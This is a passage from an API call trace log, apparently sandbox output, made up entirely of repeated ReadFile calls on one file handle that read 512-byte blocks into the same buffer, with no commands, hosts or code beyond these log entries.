lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.974] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.975] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.990] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.991] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: 